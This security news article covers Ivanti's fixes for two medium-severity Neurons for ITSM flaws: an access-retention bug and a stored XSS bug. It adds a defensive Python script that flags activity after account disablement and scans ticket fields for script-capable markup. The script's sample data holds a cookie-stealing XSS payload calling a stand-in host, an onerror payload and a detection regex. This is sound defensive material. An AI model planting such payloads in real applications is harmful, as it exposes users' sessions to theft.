Ivanti patches two Neurons for ITSM flaws that can preserve access or expose session data
Ivanti has released security fixes for two medium-severity vulnerabilities in Ivanti Neurons for ITSM, its IT service management platform. The issues, tracked as CVE-2026-4913 and CVE-2026-4914, affect versions before 2025.4 and could let an authenticated attacker keep access after account disablement or pull limited data from other users’ sessions.
The first flaw, CVE-2026-4913, is classed as improper protection of an alternate path. Ivanti says a remote authenticated attacker could retain access even after an administrator disables the account, which makes the bug especially relevant for offboarding, privilege revocation, and insider-risk scenarios: disabling an account is supposed to end its sessions and block new ones, and this flaw means it may not.
The second flaw, CVE-2026-4914, is a stored cross-site scripting bug. Ivanti says it allows a remote authenticated attacker to obtain limited information from other user sessions, and user interaction is required for exploitation.
What is affected and what needs action
Both CVEs affect Ivanti Neurons for ITSM (N-ITSM) before version 2025.4. Ivanti says on-premise customers should update to version 2025.4 through the Ivanti License System, while cloud customers do not need to take action because the fix was already applied to all cloud environments on December 12, 2025.
Ivanti also says it is not aware of active exploitation of either vulnerability at the time of disclosure. That lowers the immediate alarm level, but it does not change the need to patch on-premise deployments because both flaws require only low privileges and affect core session trust and access control.
From a risk perspective, CVE-2026-4913 may worry defenders more because it touches account disablement, which many organizations treat as a hard security boundary. CVE-2026-4914 is less severe on paper, but it can still expose session-linked information if a user opens malicious stored content. That last point is an inference from the CNA descriptions and CVSS vectors rather than a statement from Ivanti.
Severity and impact at a glance
| CVE | Issue type | Severity (CVSS) | Main impact | User interaction |
|---|---|---|---|---|
| CVE-2026-4913 | Improper protection of alternate path | Medium (5.7) | Disabled account may retain access | Required |
| CVE-2026-4914 | Stored XSS | Medium (5.4) | Limited information exposure from other user sessions | Required |
Source: Ivanti CNA data in NVD.
What admins should do now
- Upgrade on-premise Ivanti Neurons for ITSM systems to version 2025.4.
- Confirm whether any recently disabled accounts still show post-disable activity. This is a practical response based on the nature of CVE-2026-4913.
- Review stored content, custom fields, and user-generated inputs that could surface in other sessions. This follows from the stored XSS behavior described for CVE-2026-4914.
- Keep cloud environments on the radar, but note that Ivanti says hosted instances already received the fix in December 2025.
- Watch for Ivanti follow-up guidance in case the company publishes additional detection or support notes.
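A concrete way to carry out the second and third checks in the list above, as an added example that is not Ivanti's code or part of the original article: correlate account-disable events with later activity by the same account (the symptom CVE-2026-4913 would produce), and scan stored free-text fields for script-capable markup (the kind of content CVE-2026-4914 relies on). The event and record formats, the action names, and the sample data are all assumptions constructed for this example; N-ITSM's real audit export and field names differ, so map your own export into these dictionaries before running it.

```python
"""Post-patch review helpers for the two N-ITSM advisories discussed above.

Added example, not Ivanti's code. The event and record layouts are assumptions:
map your own N-ITSM audit export and ticket export into dicts of this shape.
"""
from datetime import datetime
import re

# Constructed sample audit events (ISO-8601 UTC timestamps). Not real N-ITSM data.
# Assumed action names: login, ticket_update, disable_user, enable_user.
SAMPLE_EVENTS = [
    {"ts": "2025-12-10T08:00:00Z", "user": "jdoe",   "action": "login",         "session": "s-101"},
    {"ts": "2025-12-10T09:15:00Z", "user": "admin",  "action": "disable_user",  "target": "jdoe"},
    {"ts": "2025-12-10T09:40:00Z", "user": "jdoe",   "action": "ticket_update", "session": "s-101"},
    {"ts": "2025-12-11T07:05:00Z", "user": "jdoe",   "action": "login",         "session": "s-204"},
    {"ts": "2025-12-10T10:00:00Z", "user": "asmith", "action": "login",         "session": "s-102"},
]


def parse_ts(value):
    """Parse an ISO-8601 timestamp with a trailing Z into an aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def find_post_disable_activity(events):
    """Return activity events by an account that happen after that account was disabled.

    Any hit is what CVE-2026-4913 looks like in practice: the account keeps working
    (existing session or a fresh login) after an administrator switched it off.
    A later enable_user event closes the window, so legitimate re-enables do not
    generate noise.
    """
    disabled_at = {}  # user -> datetime of the most recent disable
    hits = []
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        t = parse_ts(ev["ts"])
        if ev["action"] == "disable_user":
            disabled_at[ev["target"]] = t
            continue
        if ev["action"] == "enable_user":
            disabled_at.pop(ev["target"], None)
            continue
        off = disabled_at.get(ev["user"])
        if off is not None and t > off:
            hits.append({**ev, "disabled_at": off.isoformat()})
    return hits


# Constructed sample stored records (ticket fields). Not real data.
SAMPLE_RECORDS = [
    {"id": 1, "field": "description", "value": "Printer on floor 3 jams every morning."},
    {"id": 2, "field": "description",
     "value": "Need access<script>fetch('//x.example/?c='+document.cookie)</script>"},
    {"id": 3, "field": "signature", "value": "<img src=x onerror=alert(1)>"},
    {"id": 4, "field": "notes", "value": "Use <b>bold</b> for headings"},  # harmless formatting
]

# Markup that has no legitimate place in free-text ticket fields. Plain formatting
# tags such as <b> are deliberately not flagged so triage effort goes to real
# candidates; tune the list to what your instance actually allows.
_SUSPICIOUS = re.compile(
    r"<\s*(script|iframe|object|embed|svg|math)\b"  # active-content tags
    r"|\son[a-z]+\s*="                              # inline event handlers (onerror=, onload=)
    r"|javascript\s*:"                              # javascript: URLs
    r"|src\s*=\s*['\"]?\s*data:",                   # data: URIs in src attributes
    re.IGNORECASE,
)


def find_html_indicators(records):
    """Return (record id, field, matched fragment) for stored values carrying script-capable markup."""
    out = []
    for rec in records:
        m = _SUSPICIOUS.search(rec["value"])
        if m:
            out.append((rec["id"], rec["field"], m.group(0)))
    return out


if __name__ == "__main__":
    for hit in find_post_disable_activity(SAMPLE_EVENTS):
        print("post-disable activity:", hit)
    for rid, field, frag in find_html_indicators(SAMPLE_RECORDS):
        print(f"review record {rid} field {field!r}: matched {frag!r}")
```

The disable/activity check deliberately keys on the most recent disable event per account and resets on enable, so the output is only the activity that should have been impossible; anything it returns is worth pulling session details for. The stored-content scan is an indicator list, not a parser, so treat its hits as a triage queue and review the rendered field in a test tenant rather than in production.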
FAQ
Which of the two flaws is more severe?
By score, CVE-2026-4913 is slightly more severe at 5.7 versus 5.4 for CVE-2026-4914. It can let an authenticated attacker keep access after an account has been disabled.
Do cloud customers need to do anything?
Ivanti says cloud customers do not need to take action because it already applied the fix to all cloud environments on December 12, 2025.
Do on-premise customers need to update?
Yes. Ivanti says on-premise customers should update to version 2025.4 through the Ivanti License System.
Is either flaw being exploited?
Ivanti says it is not aware of active exploitation of either vulnerability at disclosure time.